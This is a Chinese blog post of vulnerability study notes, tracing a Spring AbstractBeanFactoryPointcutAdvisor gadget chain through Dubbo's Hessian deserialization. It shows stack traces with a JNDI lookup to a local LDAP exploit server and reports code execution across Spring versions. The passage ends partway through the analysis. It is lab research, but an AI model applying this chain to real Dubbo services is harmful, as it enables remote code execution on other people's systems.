<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="此次来尝试一下能不能摆脱之前Rome这个鸡肋的gadget，之前说过SpringAbstractBeanFactoryPointcutAdvisor也被提到可以利用，在dubbo-exp项目中有此种利用链，尝试一下。 SpringAbstractBeanFactoryPointcutAdvisor触发尝试旧版Spring实验由于项目中的spring依赖比较旧，先尝试一下旧版的dubbo  demo">
<meta property="og:type" content="article">
<meta property="og:title" content="dubbo漏洞学习-续">
<meta property="og:url" content="http://yoursite.com/2021/03/03/dubbo%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0-%E7%BB%AD/index.html">
<meta property="og:site_name" content="自动笔记生成器">
<meta property="og:description" content="此次来尝试一下能不能摆脱之前Rome这个鸡肋的gadget，之前说过SpringAbstractBeanFactoryPointcutAdvisor也被提到可以利用，在dubbo-exp项目中有此种利用链，尝试一下。 SpringAbstractBeanFactoryPointcutAdvisor触发尝试旧版Spring实验由于项目中的spring依赖比较旧，先尝试一下旧版的dubbo  demo">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://yoursite.com/images/210302/Image.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B1%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B2%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B3%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B4%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B5%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B6%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B7%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B8%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B9%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B10%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B11%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B12%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B13%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B14%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B15%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B16%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B17%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B18%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B19%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B20%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B21%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B22%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B23%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B24%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B25%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B26%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B27%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B28%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B29%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B30%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B31%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B32%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B33%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B34%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B35%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B36%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B37%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B38%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B39%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B40%5D.png">
<meta property="og:image" content="http://yoursite.com/images/210302/Image%20%5B41%5D.png">
<meta property="article:published_time" content="2021-03-03T02:00:15.000Z">
<meta property="article:modified_time" content="2021-03-03T08:58:27.433Z">
<meta property="article:author" content="0xSky">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/images/210302/Image.png">

<link rel="canonical" href="http://yoursite.com/2021/03/03/dubbo%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0-%E7%BB%AD/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>dubbo漏洞学习-续 | 自动笔记生成器</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">自动笔记生成器</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2021/03/03/dubbo%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0-%E7%BB%AD/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="0xSky">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="自动笔记生成器">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          dubbo漏洞学习-续
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-03-03 10:00:15 / 修改时间：16:58:27" itemprop="dateCreated datePublished" datetime="2021-03-03T10:00:15+08:00">2021-03-03</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>此次来尝试一下能不能摆脱之前Rome这个鸡肋的gadget，之前说过SpringAbstractBeanFactoryPointcutAdvisor也被提到可以利用，在<a href="https://github.com/threedr3am/dubbo-exp" target="_blank" rel="noopener">dubbo-exp</a>项目中有此种利用链，尝试一下。</p>
<h3 id="SpringAbstractBeanFactoryPointcutAdvisor触发尝试"><a href="#SpringAbstractBeanFactoryPointcutAdvisor触发尝试" class="headerlink" title="SpringAbstractBeanFactoryPointcutAdvisor触发尝试"></a>SpringAbstractBeanFactoryPointcutAdvisor触发尝试</h3><h4 id="旧版Spring实验"><a href="#旧版Spring实验" class="headerlink" title="旧版Spring实验"></a>旧版Spring实验</h4><p>由于项目中的spring依赖比较旧，先尝试一下旧版的dubbo  demo 0.1.0版本，查看一下依赖，这里我们选择了与exp项目依赖版本相近的springboot（spring），写好参数，运行成功弹出计算器。<br>此处dubbo演示demo的springboot依赖版本为1.3.0.RELEASE，其使用的spring版本为4.2.3.RELEASE</p>
<p><img src="/images/210302/Image.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B1%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B2%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B3%5D.png" alt=""></p>
<p>错误堆栈</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">org.springframework.beans.factory.BeanDefinitionStoreException: Invalid bean definition with name <span class="string">'ldap://127.0.0.1:1389/bxztsy'</span> defined in JNDI environment: JNDI lookup failed; nested exception is javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: ExecTemplateJDK8 cannot be cast to javax.naming.spi.ObjectFactory]; remaining name <span class="string">'bxztsy'</span></span><br><span class="line">    at org.springframework.jndi.support.SimpleJndiBeanFactory.getBean(SimpleJndiBeanFactory.java:<span class="number">125</span>) ~[spring-context-<span class="number">4.2</span><span class="number">.3</span>.RELEASE.jar:<span class="number">4.2</span><span class="number">.3</span>.RELEASE]</span><br><span class="line">    at org.springframework.aop.support.AbstractBeanFactoryPointcutAdvisor.getAdvice(AbstractBeanFactoryPointcutAdvisor.java:<span class="number">88</span>) ~[spring-aop-<span class="number">4.2</span><span class="number">.3</span>.RELEASE.jar:<span class="number">4.2</span><span class="number">.3</span>.RELEASE]</span><br><span class="line">    at org.springframework.aop.support.AbstractPointcutAdvisor.equals(AbstractPointcutAdvisor.java:<span class="number">74</span>) ~[spring-aop-<span class="number">4.2</span><span class="number">.3</span>.RELEASE.jar:<span class="number">4.2</span><span class="number">.3</span>.RELEASE]</span><br><span class="line">    at java.util.HashMap.putVal(HashMap.java:<span class="number">634</span>) ~[na:<span class="number">1.8</span><span class="number">.0_131</span>]</span><br><span class="line">    at java.util.HashMap.put(HashMap.java:<span class="number">611</span>) ~[na:<span class="number">1.8</span><span class="number">.0_131</span>]</span><br><span class="line">    at com.alibaba.com.caucho.hessian.io.MapDeserializer.doReadMap(MapDeserializer.java:<span class="number">144</span>) ~[dubbo-<span class="number">2.5</span><span class="number">.10</span>.jar:<span class="number">2.0</span><span class="number">.1</span>]</span><br><span class="line">    at com.alibaba.com.caucho.hessian.io.MapDeserializer.readMap(MapDeserializer.java:<span class="number">125</span>) ~[dubbo-<span class="number">2.5</span><span class="number">.10</span>.jar:<span class="number">2.0</span><span class="number">.1</span>]</span><br><span class="line">    at com.alibaba.com.caucho.hessian.io.Hessian2Input.readObject(Hessian2Input.java:<span class="number">2691</span>) ~[dubbo-<span class="number">2.5</span><span class="number">.10</span>.jar:<span class="number">2.0</span><span class="number">.1</span>]</span><br><span class="line">    at com.alibaba.com.caucho.hessian.io.Hessian2Input.readObject(Hessian2Input.java:<span class="number">2260</span>) ~[dubbo-<span class="number">2.5</span><span class="number">.10</span>.jar:<span class="number">2.0</span><span class="number">.1</span>]</span><br><span class="line">    at com.alibaba.dubbo.common.serialize.support.hessian.Hessian2ObjectInput.readObject(Hessian2ObjectInput.java:<span class="number">74</span>) ~[dubbo-<span class="number">2.5</span><span class="number">.10</span>.jar:<span class="number">2.0</span><span class="number">.1</span>]</span><br><span class="line">    at com.alibaba.dubbo.remoting.exchange.codec.ExchangeCodec.decodeHeartbeatData(ExchangeCodec.java:<span class="number">395</span>) [dubbo-<span class="number">2.5</span><span class="number">.10</span>.jar:<span class="number">2.0</span><span class="number">.1</span>]</span><br><span class="line">    at com.alibaba.dubbo.rpc.protocol.dubbo.DubboCodec.decodeBody(DubboCodec.java:<span class="number">119</span>) ~[dubbo-<span class="number">2.5</span><span class="number">.10</span>.jar:<span class="number">2.0</span><span class="number">.1</span>]</span><br><span class="line">    at com.alibaba.dubbo.remoting.exchange.codec.ExchangeCodec.decode(ExchangeCodec.java:<span class="number">120</span>) [dubbo-<span class="number">2.5</span><span class="number">.10</span>.jar:<span class="number">2.0</span><span class="number">.1</span>]</span><br><span class="line">    at com.alibaba.dubbo.remoting.exchange.codec.ExchangeCodec.decode(ExchangeCodec.java:<span class="number">81</span>) [dubbo-<span class="number">2.5</span><span class="number">.10</span>.jar:<span class="number">2.0</span><span class="number">.1</span>]</span><br><span class="line">    at com.alibaba.dubbo.rpc.protocol.dubbo.DubboCountCodec.decode(DubboCountCodec.java:<span class="number">44</span>) [dubbo-<span class="number">2.5</span><span class="number">.10</span>.jar:<span class="number">2.0</span><span class="number">.1</span>]</span><br><span class="line">    at com.alibaba.dubbo.remoting.transport.netty.NettyCodecAdapter$InternalDecoder.messageReceived(NettyCodecAdapter.java:<span class="number">133</span>) [dubbo-<span class="number">2.5</span><span class="number">.10</span>.jar:<span class="number">2.0</span><span class="number">.1</span>]</span><br><span class="line">    at org.jboss.netty.channel.SimpleChannelUpstreamHandler.handleUpstream(SimpleChannelUpstreamHandler.java:<span class="number">80</span>) [netty-<span class="number">3.2</span><span class="number">.5</span>.Final.jar:na]</span><br><span class="line">    at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:<span class="number">564</span>) [netty-<span class="number">3.2</span><span class="number">.5</span>.Final.jar:na]</span><br><span class="line">    at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:<span class="number">559</span>) [netty-<span class="number">3.2</span><span class="number">.5</span>.Final.jar:na]</span><br><span class="line">    at org.jboss.netty.channel.Channels.fireMessageReceived(Channels.java:<span class="number">274</span>) [netty-<span class="number">3.2</span><span class="number">.5</span>.Final.jar:na]</span><br><span class="line">    at org.jboss.netty.channel.Channels.fireMessageReceived(Channels.java:<span class="number">261</span>) [netty-<span class="number">3.2</span><span class="number">.5</span>.Final.jar:na]</span><br><span class="line">    at org.jboss.netty.channel.socket.nio.NioWorker.read(NioWorker.java:<span class="number">349</span>) [netty-<span class="number">3.2</span><span class="number">.5</span>.Final.jar:na]</span><br><span class="line">    at org.jboss.netty.channel.socket.nio.NioWorker.processSelectedKeys(NioWorker.java:<span class="number">280</span>) [netty-<span class="number">3.2</span><span class="number">.5</span>.Final.jar:na]</span><br><span class="line">    at org.jboss.netty.channel.socket.nio.NioWorker.run(NioWorker.java:<span class="number">200</span>) [netty-<span class="number">3.2</span><span class="number">.5</span>.Final.jar:na]</span><br><span class="line">    at org.jboss.netty.util.ThreadRenamingRunnable.run(ThreadRenamingRunnable.java:<span class="number">108</span>) [netty-<span class="number">3.2</span><span class="number">.5</span>.Final.jar:na]</span><br><span class="line">    at org.jboss.netty.util.internal.DeadLockProofWorker$<span class="number">1</span>.run(DeadLockProofWorker.java:<span class="number">44</span>) [netty-<span class="number">3.2</span><span class="number">.5</span>.Final.jar:na]</span><br><span class="line">    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:<span class="number">1142</span>) [na:<span class="number">1.8</span><span class="number">.0_131</span>]</span><br><span class="line">    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:<span class="number">617</span>) [na:<span class="number">1.8</span><span class="number">.0_131</span>]</span><br><span class="line">    at java.lang.Thread.run(Thread.java:<span class="number">748</span>) [na:<span class="number">1.8</span><span class="number">.0_131</span>]</span><br><span class="line">Caused by: javax.naming.NamingException: problem generating object using object factory</span><br><span class="line">    at com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:<span class="number">1092</span>) ~[na:<span class="number">1.8</span><span class="number">.0_131</span>]</span><br><span class="line">    at com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:<span class="number">542</span>) ~[na:<span class="number">1.8</span><span class="number">.0_131</span>]</span><br><span class="line">    at com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompositeContext.java:<span class="number">177</span>) ~[na:<span class="number">1.8</span><span class="number">.0_131</span>]</span><br><span class="line">    at com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:<span class="number">205</span>) ~[na:<span class="number">1.8</span><span class="number">.0_131</span>]</span><br><span class="line">    at com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:<span class="number">94</span>) ~[na:<span class="number">1.8</span><span class="number">.0_131</span>]</span><br><span class="line">    at javax.naming.InitialContext.lookup(InitialContext.java:<span class="number">417</span>) ~[na:<span class="number">1.8</span><span class="number">.0_131</span>]</span><br><span class="line">    at org.springframework.jndi.JndiTemplate$<span class="number">1</span>.doInContext(JndiTemplate.java:<span class="number">155</span>) ~[spring-context-<span class="number">4.2</span><span class="number">.3</span>.RELEASE.jar:<span class="number">4.2</span><span class="number">.3</span>.RELEASE]</span><br><span class="line">    at org.springframework.jndi.JndiTemplate.execute(JndiTemplate.java:<span class="number">87</span>) ~[spring-context-<span class="number">4.2</span><span class="number">.3</span>.RELEASE.jar:<span class="number">4.2</span><span class="number">.3</span>.RELEASE]</span><br><span class="line">    at org.springframework.jndi.JndiTemplate.lookup(JndiTemplate.java:<span class="number">152</span>) ~[spring-context-<span class="number">4.2</span><span class="number">.3</span>.RELEASE.jar:<span class="number">4.2</span><span class="number">.3</span>.RELEASE]</span><br><span class="line">    at org.springframework.jndi.JndiTemplate.lookup(JndiTemplate.java:<span class="number">179</span>) ~[spring-context-<span class="number">4.2</span><span class="number">.3</span>.RELEASE.jar:<span class="number">4.2</span><span class="number">.3</span>.RELEASE]</span><br><span class="line">    at org.springframework.jndi.JndiLocatorSupport.lookup(JndiLocatorSupport.java:<span class="number">95</span>) ~[spring-context-<span class="number">4.2</span><span class="number">.3</span>.RELEASE.jar:<span class="number">4.2</span><span class="number">.3</span>.RELEASE]</span><br><span class="line">    at org.springframework.jndi.support.SimpleJndiBeanFactory.doGetSingleton(SimpleJndiBeanFactory.java:<span class="number">218</span>) ~[spring-context-<span class="number">4.2</span><span class="number">.3</span>.RELEASE.jar:<span class="number">4.2</span><span class="number">.3</span>.RELEASE]</span><br><span class="line">    at org.springframework.jndi.support.SimpleJndiBeanFactory.getBean(SimpleJndiBeanFactory.java:<span class="number">112</span>) ~[spring-context-<span class="number">4.2</span><span class="number">.3</span>.RELEASE.jar:<span class="number">4.2</span><span class="number">.3</span>.RELEASE]</span><br><span class="line">    ... <span class="number">28</span> common frames omitted</span><br><span class="line">Caused by: java.lang.ClassCastException: ExecTemplateJDK8 cannot be cast to javax.naming.spi.ObjectFactory</span><br><span class="line">    at javax.naming.spi.NamingManager.getObjectFactoryFromReference(NamingManager.java:<span class="number">163</span>) ~[na:<span class="number">1.8</span><span class="number">.0_131</span>]</span><br><span class="line">    at javax.naming.spi.DirectoryManager.getObjectInstance(DirectoryManager.java:<span class="number">189</span>) ~[na:<span class="number">1.8</span><span class="number">.0_131</span>]</span><br><span class="line">    at com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:<span class="number">1085</span>) ~[na:<span class="number">1.8</span><span class="number">.0_131</span>]</span><br><span class="line">    ... <span class="number">40</span> common frames omitted</span><br></pre></td></tr></table></figure>


<p>调用栈</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">lookup:<span class="number">202</span>, GenericURLContext (com.sun.jndi.toolkit.url)</span><br><span class="line">lookup:<span class="number">94</span>, ldapURLContext (com.sun.jndi.url.ldap)</span><br><span class="line">lookup:<span class="number">417</span>, InitialContext (javax.naming)</span><br><span class="line">doInContext:<span class="number">155</span>, JndiTemplate$<span class="number">1</span> (org.springframework.jndi)</span><br><span class="line">execute:<span class="number">87</span>, JndiTemplate (org.springframework.jndi)</span><br><span class="line">lookup:<span class="number">152</span>, JndiTemplate (org.springframework.jndi)</span><br><span class="line">lookup:<span class="number">179</span>, JndiTemplate (org.springframework.jndi)</span><br><span class="line">lookup:<span class="number">95</span>, JndiLocatorSupport (org.springframework.jndi)</span><br><span class="line">doGetSingleton:<span class="number">218</span>, SimpleJndiBeanFactory (org.springframework.jndi.support)</span><br><span class="line">getBean:<span class="number">112</span>, SimpleJndiBeanFactory (org.springframework.jndi.support)</span><br><span class="line">getAdvice:<span class="number">88</span>, AbstractBeanFactoryPointcutAdvisor (org.springframework.aop.support)</span><br><span class="line">equals:<span class="number">74</span>, AbstractPointcutAdvisor (org.springframework.aop.support)</span><br><span class="line">putVal:<span class="number">634</span>, HashMap (java.util)</span><br><span class="line">put:<span class="number">611</span>, HashMap (java.util)</span><br><span class="line">doReadMap:<span class="number">144</span>, MapDeserializer (com.alibaba.com.caucho.hessian.io)</span><br><span class="line">readMap:<span class="number">125</span>, MapDeserializer (com.alibaba.com.caucho.hessian.io)</span><br><span class="line">readObject:<span class="number">2691</span>, Hessian2Input (com.alibaba.com.caucho.hessian.io)</span><br><span class="line">readObject:<span class="number">2260</span>, Hessian2Input (com.alibaba.com.caucho.hessian.io)</span><br><span class="line">readObject:<span class="number">74</span>, Hessian2ObjectInput (com.alibaba.dubbo.common.serialize.support.hessian)</span><br><span class="line">decodeHeartbeatData:<span class="number">395</span>, ExchangeCodec (com.alibaba.dubbo.remoting.exchange.codec)</span><br><span class="line">decodeBody:<span class="number">119</span>, DubboCodec (com.alibaba.dubbo.rpc.protocol.dubbo)</span><br><span class="line">decode:<span class="number">120</span>, ExchangeCodec (com.alibaba.dubbo.remoting.exchange.codec)</span><br><span class="line">decode:<span class="number">81</span>, ExchangeCodec (com.alibaba.dubbo.remoting.exchange.codec)</span><br><span class="line">decode:<span class="number">44</span>, DubboCountCodec (com.alibaba.dubbo.rpc.protocol.dubbo)</span><br><span class="line">messageReceived:<span class="number">133</span>, NettyCodecAdapter$InternalDecoder (com.alibaba.dubbo.remoting.transport.netty)</span><br><span class="line">handleUpstream:<span class="number">80</span>, SimpleChannelUpstreamHandler (org.jboss.netty.channel)</span><br><span class="line">sendUpstream:<span class="number">564</span>, DefaultChannelPipeline (org.jboss.netty.channel)</span><br><span class="line">sendUpstream:<span class="number">559</span>, DefaultChannelPipeline (org.jboss.netty.channel)</span><br><span class="line">fireMessageReceived:<span class="number">274</span>, Channels (org.jboss.netty.channel)</span><br><span class="line">fireMessageReceived:<span class="number">261</span>, Channels (org.jboss.netty.channel)</span><br><span class="line">read:<span class="number">349</span>, NioWorker (org.jboss.netty.channel.socket.nio)</span><br><span class="line">processSelectedKeys:<span class="number">280</span>, NioWorker (org.jboss.netty.channel.socket.nio)</span><br><span class="line">run:<span class="number">200</span>, NioWorker (org.jboss.netty.channel.socket.nio)</span><br><span class="line">run:<span class="number">108</span>, ThreadRenamingRunnable (org.jboss.netty.util)</span><br><span class="line">run:<span class="number">44</span>, DeadLockProofWorker$<span class="number">1</span> (org.jboss.netty.util.internal)</span><br><span class="line">runWorker:<span class="number">1142</span>, ThreadPoolExecutor (java.util.concurrent)</span><br><span class="line">run:<span class="number">617</span>, ThreadPoolExecutor$Worker (java.util.concurrent)</span><br><span class="line">run:<span class="number">748</span>, Thread (java.lang)</span><br></pre></td></tr></table></figure>

<h4 id="其他版本实验"><a href="#其他版本实验" class="headerlink" title="其他版本实验"></a>其他版本实验</h4><p>springboot 1.5.18RELEASE，spring 4.3.21RELEASE正常触发（dubbo  demo 0.1.2）</p>
<p><img src="/images/210302/Image%20%5B4%5D.png" alt=""></p>
<p>springboot 2.1.2.RELEASE，spring 5.1.4.RELEASE正常触发（dubbo  demo 2.7.0）</p>
<p><img src="/images/210302/Image%20%5B5%5D.png" alt=""></p>
<p>springboot 2.3.1.RELEASE，5.2.7.RELEASE正常触发</p>
<p><img src="/images/210302/Image%20%5B6%5D.png" alt=""></p>
<p>springboot 2.3.9.RELEASE，5.2.13.RELEASE正常触发，这是测试时最新的发行版</p>
<p><img src="/images/210302/Image%20%5B7%5D.png" alt=""></p>
<h4 id="尝试分析流程"><a href="#尝试分析流程" class="headerlink" title="尝试分析流程"></a>尝试分析流程</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">decodeBody:<span class="number">119</span>, DubboCodec (com.alibaba.dubbo.rpc.protocol.dubbo)</span><br><span class="line">decode:<span class="number">120</span>, ExchangeCodec (com.alibaba.dubbo.remoting.exchange.codec)</span><br><span class="line">decode:<span class="number">81</span>, ExchangeCodec (com.alibaba.dubbo.remoting.exchange.codec)</span><br></pre></td></tr></table></figure>


<p>这三步调用和之前的反序列化是相同，都是对输入的数据流进行解码，的我们在链上设置好断点，跟进调试</p>
<p><img src="/images/210302/Image%20%5B8%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B9%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B10%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B11%5D.png" alt=""></p>
<p>decode过程的前几步调用和之前使用Rome依赖是一样的都是解码数据流的调用，在docodeBody函数中流程与之前有所变化，由于req的属性与之前不同进入的条件分支改变了，触发了decodeHeartbeatData方法</p>
<p><img src="/images/210302/Image%20%5B12%5D.png" alt=""></p>
<p>在decodeHeartbeatData方法中调用了ObjectInput的readObject方法，此处就和Rome依赖中触发重写的readObject一样了</p>
<p><img src="/images/210302/Image%20%5B13%5D.png" alt=""></p>
<p>经过与前文一样的readObject调用链，触发HashMap的put方法</p>
<p><img src="/images/210302/Image%20%5B14%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B15%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B16%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B17%5D.png" alt=""></p>
<p><img src="/images/210302/Image%20%5B18%5D.png" alt=""></p>
<p>此处put调用putVal</p>
